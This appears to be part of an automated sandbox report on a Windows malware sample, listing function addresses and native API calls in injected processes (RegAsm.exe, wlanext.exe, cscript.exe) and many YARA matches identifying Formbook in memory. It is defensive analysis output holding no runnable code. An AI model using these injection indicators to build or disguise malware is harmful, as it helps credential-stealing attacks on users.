          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047DA3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_029782B0 NtClose
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_02978230 NtReadFile
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_02978360 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_02978180 NtCreateFile
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_029782AA NtClose
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0297822A NtReadFile
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0297835E NtAllocateVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041B99F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041CB27
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00408C2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00408C30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041C53B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041BD88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E2B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0304EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D03DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DDBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030CFA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E22AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0301F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03034120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030EE824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0302B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030420A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E20A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E28EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030EDFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E1FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DD616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03036E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E2EF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E2D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03010D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03042581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E25DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0302D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0302841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DD466
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_00B6FF88
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_00B6F37F
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_02CC04E1
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_02CC04F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041B99F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041CB27
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00408C2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00408C30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041C53B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041BD88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC22AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FAFA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FA23E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB03DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FBDBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2ABD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02F2EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02F2138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02F1AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02F9CB4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02FC2B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02FC28EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02F220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02FC20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02F0B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02F1A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02FCE824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02FB1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02F199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02EFF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02FC2EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02F16E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02FBD616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02FC1FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02FCDFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02FB4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02F1B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02FBD466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02F0841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02F0D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02FC25DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02F22581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02FB2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02FC1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02EF0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02FC2D07
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_0373AB40
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037BCB4F
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037E2B28
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_0373A309
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037C23E3
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037D03DA
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_0374ABD8
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037DDBD2
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_0374EBB0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_0374138B
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_0373B236
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037CFA2B
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037D4AEF
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037E22AE
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_03734120
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_0371F900
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037399BF
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_0373A830
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037EE824
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037D1002
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037E28EC
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037420A0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037E20A8
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_0372B090
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037E1FF1
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037EDFCE
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_03736E30
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037DD616
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037E2EF7
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037E1D55
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_03710D20
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037E2D07
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_0372D5E0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037E25DD
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_03742581
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037D2D82
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_0373B477
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037DD466
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_0372841F
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_037D4496
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_0325CB27
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_0325B954
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_0325B998
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_03242FB0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_0325C53B
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_03242D88
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_0325BD88
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_03242D90
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_03248C2C
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 6_2_03248C30
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047BB477
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04854496
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047A841F
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0485D466
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04852D82
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04790D20
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_048625DD
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04862D07
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047AD5E0
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04861D55
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047C2581
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04841EB6
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047B6E30
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04862EF7
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047B5600
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0485D616
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0486DFCE
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04861FF1
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_048620A8
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047BA830
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_048628EC
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04851002
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0486E824
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047C20A0
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047AB090
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047B4120
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0479F900
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047B99BF
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_048622AE
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047BB236
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04854AEF
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0484FA2B
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047BAB40
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0485DBD2
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_048503DA
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_048423E3
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047BA309
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047CABD8
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04862B28
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047CEBB0
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0483CB4F
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047BEB9A
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047C138B
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0297CB27
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0297B998
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0297B954
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_02962FB0
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_02968C30
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_02968C2C
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_02962D90
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_02962D88
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0297BD88
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0297C53B
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 0371B150 appears 136 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 02EFB150 appears 136 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 0301B150 appears 48 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00419F30 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 0041A060 appears 50 times
Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 0479B150 appears 145 times
Source: NQQWym075C.exe, 00000004.00000002.498473507.0000000005F80000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamenbqzOvmZAbSHtViT.bounce.exe4 vs NQQWym075C.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
